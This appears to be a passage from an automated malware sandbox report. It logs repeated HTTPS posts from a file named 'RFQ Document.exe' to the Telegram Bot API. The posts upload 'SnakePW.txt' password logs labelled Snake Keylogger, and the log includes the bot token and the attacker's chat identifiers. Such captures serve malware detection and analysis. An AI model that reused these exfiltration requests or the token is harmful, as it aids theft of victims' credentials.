{"ok":true,"result":{"message_id":12747,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49790	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:23 UTC	25	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c3ba1acd Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:23 UTC	25	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 62 61 31 61 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c3ba1acdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:23 UTC	26	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:23 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:23 UTC	26	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12595,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.2.4	49974	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:06 UTC	255	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dd2bac15 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:06 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 32 62 61 63 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dd2bac15Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:06 UTC	256	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:06 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:06 UTC	257	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12748,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808746,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.2.4	49975	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:07 UTC	257	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ddbd1b4c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:07 UTC	257	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 62 64 31 62 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ddbd1b4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:07 UTC	258	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:07 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:07 UTC	258	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12749,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808747,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.2.4	49977	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:07 UTC	259	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dde3413e Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:07 UTC	259	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 64 65 33 34 31 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dde3413eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:07 UTC	259	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:07 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:07 UTC	260	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12751,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808747,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.2.4	49978	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:08 UTC	260	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255de096688 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:08 UTC	261	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 30 39 36 36 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255de096688Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:08 UTC	261	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:08 UTC	261	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12752,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.2.4	49979	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:08 UTC	262	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255de28f1b6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:08 UTC	262	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 32 38 66 31 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255de28f1b6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:08 UTC	263	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:08 UTC	263	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12753,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.2.4	49980	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:08 UTC	264	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255de403f36 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:08 UTC	264	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 65 34 30 33 66 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255de403f36Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:08 UTC	264	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:08 UTC	265	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12754,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808748,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.2.4	49981	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:08 UTC	265	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255de5cd898 Host: api.telegram.org Content-Length: 407
